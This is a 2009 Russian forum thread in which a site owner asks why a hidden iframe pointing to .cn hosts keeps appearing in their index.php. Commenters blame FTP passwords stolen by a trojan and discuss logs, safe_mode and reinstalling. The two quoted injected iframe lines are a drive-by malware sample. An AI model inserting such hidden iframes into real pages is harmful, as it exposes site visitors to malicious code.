7 июня 2009 в 14:32
Раз в какое-то время вставляется вот такая строчка в index.php :
<ифрэйм src="http://globalnameshop.cn:8080/index.php" width=139 height=125 style="visibility: hidden">
Как итог, белая страница сайта, типа нехватка памяти.
Как это добавляется эта строчка? Права на файл 644.
Вот инфа по домену, который прописан тут http://1whois.ru/?url=globalnameshop.cn
Как с этим бороться?
P.S. Проблема появилась неделю назад
Комментарии
Если у вас самопроизвольно вставляется какая-либо строчка в index.php, то значит вас сломали.
Смените пароль на FTP и панель управления хостингом
мдя, как это умудрились сломать пароль из 30 символов ))) с цифрами и буквами, в т.ч. и заглавные ))?
Интересно какой тогда пароль делать то?
А пароль вы наверное каждый раз в ручную вводите?
на вирь проверьтесь
Можете поставить хоть стопицот символов, но если вы сохранили в клиенте, то толку от него никакого
наверное WinSCP юзали - по SSH ломануть можно как раз плюнуть
Ага, ваще как два пальца обосцать.
Скажи ещё что телнет круче в плане ИБ.
Скорее всего использовался тотал коммандер или Filezilla, которая сохраняет пароли, даже если вы её не просите
С таким случаями сталкивался не раз как администратор хостинга. У клиента на машине троянец, после чего пароль уходит хацкерам, которые по FTP заливают всякую дрянь. Один из распространённых методов - это тупо по FTP скачивают все файлы index.php или index.html из каталогов и выкладывают их обратно уже со вставками код JavaScript.
Сложность пароля ни на что не влияет - троянец прочитает сохранённые на клиенте пароли любой сложности.
Да, точно, использую именно файлзиллу, на работе.((
А как на счет cuteftp? Он тоже опасный?
А тоталкомандэр не использую
Опасны все клиенты сохраняющие пароль, либо работать из линукса, либо не сохранять никак пароль, в Filezilla отключить историю или как она там называется
Он у вас лицензионный?Если с варезника,то вполне возможно там уже есть жизнь
Я так понял вставляет ява-скрипт? У меня было такое же,поцокало все index на всех доменах в пределах хоста.
Исцелил так:Форматнул винду,изменил пароли,поставил лицензионный каспер.Пароли теперь ввожу каждый раз самостоятельно
Мдя...., довольно муторно получается, но по все видимости, что именно так и придется делать... так или иначе сталкиваюсь с этим раз десятый ))) То бишь подбирали пароль к фтп...
НЕ помогло, вручную вводил, все равно добавился
<ифрэйм src="http://shopfilmexistence.cn:8080/index.php" width=105 height=148 style="visibility: hidden">
Обратитесь к хостеру.
Посмотрите дату и время модификации файла, попробуйте отыскать в логе веб-сервера подозрительную активность в это время. Посмотрите также лог ftp - может быть заливают через него. Стопудов вас ломают. Например, ещё такое может быть, если у вас mod_php и выключен safe_mode.
Именно
linux рулит.
сдается, что это скорее сломали друпальную инсталляцию нежели перехватили пароль. залить версию друпала, и модули, с нуля. проверить директорию files на наличее php скриптов. поставить для index.php права доступа без права write для всех, и на директорию тоже. запретить вход по аккаунт, кроме как с заранее указаных IP-адресов.
Мдя, врубил safe_mode и тут же выскочило images/img_thumbnails is not writeable хотя на эти паки поставлены права 777
Хозяина глянь на каталог
И че глядеть? на что обращать внимание то?
Вы понимаете, что такое safe_mode или это для вас какие-то непонятные слова?
Почитайте.
http://www.opennet.ru/docs/RUS/php42/safe-mode.html
Да значение этого я понимаю )))
Тогда уже я не понимаю, что вам непонятно:
По-моему на указанной мной странице всё довольно подробно описано.